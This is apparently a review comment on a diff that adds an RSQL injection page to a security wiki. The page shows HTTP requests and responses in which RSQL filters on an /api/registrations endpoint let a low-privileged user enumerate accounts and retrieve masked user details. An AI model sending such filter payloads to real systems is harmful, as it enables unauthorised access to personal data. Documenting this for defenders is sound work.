pages/attacks/RSQL_Injection.md

```diff
@@ -0,0 +1,664 @@
+Access-Control-Allow-Origin: *
+Content-Length: 85
+
+{
+    "errors": [{
+        "code": "BLANK",
+        "detail": "Missing required param: email",
+        "status": "400"
+    }]
+}
+```
+
+Although a `/api/registrations?email=<emailAccount>` is expected, it is possible to use RSQL filters to attempt to enumerate and/or extract user information through the use of special operators:
+
+### Request
+
+```http
+GET /api/registrations?filter[userAccounts]=email=='test@test.com' HTTP/1.1
+Host: localhost:3000
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
+Accept: application/vnd.api+json
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/vnd.api+json
+Origin: https://locahost:3000
+Connection: keep-alive
+Referer: https://locahost:3000/
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-site
+```
+
+### Response
+
+```http
+HTTP/1.1 200 
+Date: Sat, 22 Mar 2025 14:09:38 GMT
+Content-Type: application/vnd.api+json;charset=UTF-8
+Content-Length: 38
+Connection: keep-alive
+Vary: Origin
+Vary: Access-Control-Request-Method
+Vary: Access-Control-Request-Headers
+Access-Control-Allow-Origin: *
+
+{
+    "data": {
+        "attributes": {
+            "tenants": []
+        }
+    }
+}
+```
+
+In the case of matching a valid email account, the application would return the user's information instead of a classic *“true”*, *"1"* or whatever in the response to the server:
+
+### Request
+
+```http
+GET /api/registrations?filter[userAccounts]=email=='manuel**********@domain.local' HTTP/1.1
+Host: localhost:3000
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
+Accept: application/vnd.api+json
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/vnd.api+json
+Origin: https://localhost:3000
+Connection: keep-alive
+Referer: https://localhost:3000/
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-site
+```
+
+### Response
+
+```http
+HTTP/1.1 200 
+Date: Sat, 22 Mar 2025 14:19:46 GMT
+Content-Type: application/vnd.api+json;charset=UTF-8
+Content-Length: 293
+Connection: keep-alive
+Vary: Origin
+Vary: Access-Control-Request-Method
+Vary: Access-Control-Request-Headers
+Access-Control-Allow-Origin: *
+
+{
+    "data": {
+        "id": "********************",
+        "type": "UserAccountDTO",
+        "attributes": {
+            "id": "********************",
+            "type": "UserAccountDTO",
+            "email": "manuel**********@domain.local",
+            "sub": "*********************",
+            "status": "ACTIVE",
+            "tenants": [{
+                "id": "1"
+            }]
+        }
+    }
+}
+In this scenario, we start from a user with a basic role and in which we do not have privileged permissions (e.g. administrator) to access the list of all users registered in the database:
```

Comment:
```suggestion
}
```
In this scenario, we start from a user with a basic role and in which we do not have privileged permissions (e.g. administrator) to access the list of all users registered in the database:
```